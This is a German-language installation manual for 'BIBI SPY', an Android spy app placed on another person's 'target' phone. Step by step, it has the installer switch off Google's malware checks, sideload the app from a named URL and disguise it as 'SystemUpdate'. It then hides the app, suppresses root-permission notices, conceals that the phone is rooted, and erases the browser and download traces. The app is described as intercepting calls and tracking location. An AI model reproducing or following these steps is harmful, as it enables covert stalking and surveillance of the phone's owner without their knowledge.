INSTALLATION FÜR ANDROID

Entscheiden Sie ob Sie die Funktionen erfordern, die die Root-Genehmigung benötigen. Wenn ja, rooten Sie bitte das Gerät, bevor Sie fortfahren.

– Sie müssen das ZIEL-Telefon für die Installation physisch in Ihrer Hand haben
– Das ZIEL-Telefon hat Internetzugang. Dieser kann durch WIFI, GPRS oder 3G erfolgen.
– Die Funktion “Unbekannte Quellen“ muss aktiviert werden.
– Das Abhören von Anrufen in Echtzeit erfordert die Funktion des Conference Call auf dem Ziel-Telefon
– Das GPS muss für die Verfolgung der Position aktiviert sein
– Wenn die obigen Punkte erfolgt sind, gehen Sie weiter.

Von dem Dashboard Ihres Accounts, klicken Sie auf “Anmeldung“ im Seitenmenü. Dann klicken Sie auf “inaktiv“. Wo “Lizenzschlüssel“ (License Key) steht, werden Sie Ihren Aktivierungscode für die Software sehen. Bitte schreiben Sie ihn auf, um Ihre Software bei der Installation zu aktivieren. Hier folgend finden Sie ein Bild als Beispiel.

M01

Die folgenden Schritte müssen auf den Ziel-Smartphones durchgeführt werden. Wir verwenden die Android-Version 4.1.2 als Beispiel. Für Geräte mit früheren oder späteren Versionen des Betriebssystems, können diese Schritte leicht verändert sein. WICHTIG: Um die erweiterten Funktionen der Software zu aktivieren, muss das Zielgerät vor der Installation gerootet sein. Wenn Sie ihr Zieltelefon nachher rooten, müssen Sie die Software deaktivieren und de-installieren, dann erneut installieren, um die SuperSU-Genehmigungen auf dem gerooteten Gerät zu erhalten. Bevor wir beginnen, versichern Sie sich bitte, dass die folgenden Funktionen auf dem Zieltelefon richtig eingestellt sind.

• Einstellungen > Sicherheit und AKTIVIEREN SIE “Unbekannte Quellen“.
• Einstellungen > Sicherheit und DEAKTIVIEREN SIE “App prüfen“.
• <<Für Android OS 5 und darüber>> Google – Einstellungen > Sicherheit > App Überprüfen > DEAKTIVIEREN SIE “Sicherheitsbedrohungen im Gerät suchen“.

 

M02

1) Öffnen Sie den Internet-Browser auf dem Gerät und geben Sie http://ddbi.biz/ ein, fügen Sie 123 ein, um fortzufahren. Sie werden vielleicht gebeten, die Plattform des Geräts zu wählen. Wählen Sie “Android“ und die Software wird automatisch heruntergeladen. Gehen Sie weiter.

M03

2) Auf der Benachrichtigungsleiste an der Oberseite des Gerätes, werden Sie sehen, dass die Software heruntergeladen wird. Sie können den Bildschirm nach unten scrollen, um den Download-Fortschritt zu sehen. Sobald die Operation abgeschlossen ist, tippen Sie darauf, um sie auszuwählen.

3) Um die Installation zu beginnen, klicken Sie auf “Next“, bis “Installieren“ angezeigt wird und klicken es an.

M05

4) Tippen Sie auf “Open“. Wenn der Startbildschirm der Software-Einstellungen in diesem Stadium verschwindet, gehen Sie auf den Home-Bildschirm und tippen Sie auf das Symbol “System Update“, um zurück hineinzukommen.

M06

5) NUR Android mit ROOT: “Noch nicht“ (Not Yet), um “Benachrichtigungen und Re-Authentifizierung von SuperSu“ zu deaktivieren, um versteckt zu bleiben. Wenn das Ziel-Gerät nicht GEROOTET IST, sieht man diesen Schritt nicht. Deshalb gehen Sie automatisch zu Punkt 13.

M007

6) NUR Android mit ROOT: Tippen Sie auf “OK, es ist klar, (OK, I got it)“. Öffnen Sie SuperSU.

M08

7) NUR Android mit ROOT: Innerhalb SuperSU, tippen Sie auf “Einstellungen“ (Settings), scrollen Sie nach unten und deaktivieren Sie beide “Benachrichtigungen anzeigen (Show notifications)” und “Re-Authentifizierung (Re-authentication)“.

8) NUR Android mit ROOT: Nachdem Sie “Benachrichtigungen anzeigen (Show notifications)” und”Re-Authentifizierung (Re-authentication)“.deaktiviert haben, gehen Sie zurück zum Hauptbildschirm, suchen Sie nach dem Symbol”SystemUpdate“, tippen Sie es an und drücken Sie”Ja (Yes)“.

M11

9) NUR Android mit ROOT: Drücken Sie für die erste Installation auf “Bereits gemacht“ (Already Done). Wenn sie die Software bereits zuvor auf dem Gerät installiert haben, könnte es notwendig sein, auf “Launch Superuser“ und dann auf “Apps“ zu tippen, um “SystemUpdate“ zu suchen. Wenn Sie es gefunden haben, klicken Sie auf “Forget“, um versteckt zu bleiben. Wenn Sie “Systemupdate“ nicht finden können, gehen Sie bitte zum nächsten Schritt.

M12

10) NUR Android mit ROOT: Drücken Sie “WEITER“ (Next).

M13

11) NUR Android mit ROOT: Tippen Sie auf “Grant“ für die SUPERUSER-Anforderung. Stellen Sie sicher, dass “Erneut fragen“ (Ask again) DEAKTIVIERT IST. HINWEIS: Wenn Sie die Berechtigung nicht erteilen, oder wenn Sie diese Seite verlassen, werden Sie trotzdem Zugriff auf die Standardfunktionen haben.

M14

12) NUR Android mit ROOT: Dieses Fenster bietet Ihnen die Möglichkeit, das Root-Symbol, Super-User-Symbol oder SuperSU auf dem Gerät zu verstecken, damit es so scheint, dass es nie gerootet wurde. Wenn Sie dies wünschen, klicken Sie bitte “YES“. In dieser Phase wird die Software konfiguriert und es könnte ein paar Minuten in Anspruch nehmen. Bitte berühren oder drücken Sie keine Taste am Telefon. HINWEIS: Das Superuser oder SuperSU Symbol kann jederzeit durch eine Steuerung aus der Ferne sichtbar gemacht werden. Kontaktieren Sie uns für weitere Details.

M15

13A) Dieser Bildschirm wird Ihnen sagen, welche Software-Version auf dem Gerät läuft. In diesem Beispiel wurde das Gerät gerootet und die Software hat den vollen Zugang SuperSU erhalten; Die Software läuft im FULL-Modus. Tippen Sie auf “Jetzt neu starten“ (Restart Now).

Wenn Sie diesen Bildschirm sehen, bedeutet das, dass das Gerät nicht in der Lage ist, die SUPERUSER-Anforderung (Schritt 11) durchzuführen, obwohl es vielleicht gerootet wurde. Klicken Sie bitte auf “Erneut versuchen“ (Try again), starten Sie das Gerät neu und Sie werden das Symbol “SystemUpdate“ auf dem Bildschirm sehen. Tippen Sie auf das Symbol und gehen Sie zurück zu Schritt 5, um die SUPERUSER-Anforderung erneut durchzuführen. Wenn es wieder nicht funktioniert, tippen Sie auf “Limited 1 verwenden“ und starten Sie das Gerät neu. Die Installation wird vollständig sein.

M16

13B) Wenn Sie auf dem Bildschirm sehen, “Arbeitet im Normalbetrieb”, bedeutet dies, dass das Gerät nicht richtig gerootet wurde, der SUPERUSER-Anforderung (Schritt 11) nicht vollkommen funktioniert. Für den Fall, dass das Telefon gerootet wurde, stellen Sie sicher, dass die SIM-Karte eingelegt ist und der Telefon-Service zur Verfügung steht, und klicken Sie auf die Android-Menü-Taste auf dem Gerät, um es in den Vordergrund zu bringen. Sie werden sehen, das die “Roll Back“ Option zur Verfügung steht. Klicken Sie diese an. Wenn das erledigt ist, klicken Sie auf “Switch Mode“. Sie werden gebeten, zwischen “Normal“, “Limited 1“ und “Full“ zu wählen. Wählen Sie “Full“ und die Software wird erneut versuchen, die SUPERUSER-Berechtigungen auf dem Telefon zu bekommen. Wenn Sie nur zwischen “Limited 1“ und “Normal“ wählen können, können Sie mit der Installation fortfahren. Die meisten Funktionen werden verwendbar sein.

M17

14) Nach dem Neustart des Geräts, sehen Sie das “Systemupdate“-Symbol auf dem Bildschirm. Tippen Sie auf das Symbol und Sie werden den Aktivierungsbildschirm sehen. Bitte geben Sie Ihren Aktivierungscode XXXXXXX ein und tippen Sie auf “Aktivieren“. Warten Sie, bis es vervollständigt ist.

M18

15) Sobald Sie sehen, “Aktivierung erfolgreich abgeschlossen“ (Nice! Activation success), wird die Software für die Verwendung aktiviert und betriebsbereit sein. Sie werden aufgefordert, zu entscheiden, ob Sie wollen, dass die Software auf Ihrem Handy sichtbar sein soll. Wenn Sie “YES“ wählen, wird der Nutzer des Telefons das “Systemupdate” Symbol auf dem Bildschirm sehen. Wenn Sie “Nein” wählen, wird die Software ausgeblendet. Dies wirkt sich in keiner Weise auf die Funktionalität der Software aus. Wenn Sie wählen, die Software sichtbar zu behalten und Sie tippen auf das Symbol “SystemUpdate“, werden Sie den folgenden Bildschirm sehen.

Nach Abschluss kehren Sie zu dem Android-Startbildschirm um die Programmschnittstelle zu verlassen. WICHTIG: Damit bleiben Sie versteckt bleiben, folgen Sie den nächsten Schritten, um die gesamte Download-Chronologie zu löschen. Löschen Sie den App-Downloead, Chache und Cookies.

1. Öffnen Sie den Browser des Telefons.
2. Gehen Sie auf das Menü im Telefon dann auf “Einstellungen“.
3. Wählen Sie “Datenschutz und Sicherheit“.
4. Wählen Sie “Cache löschen, Verlauf löschen und alle Cookies Daten löschen“
5. Nun müssen wir die Download-Datei zu löschen. Gehen Sie zum Browser des Telefons > Einstellungen und wählen Sie “Downloads“, suchen Sie die heruntergeladene Datei und löschen Sie sie.

Sie haben nun den Installationsprozess für BIBI SPY abgeschlossen.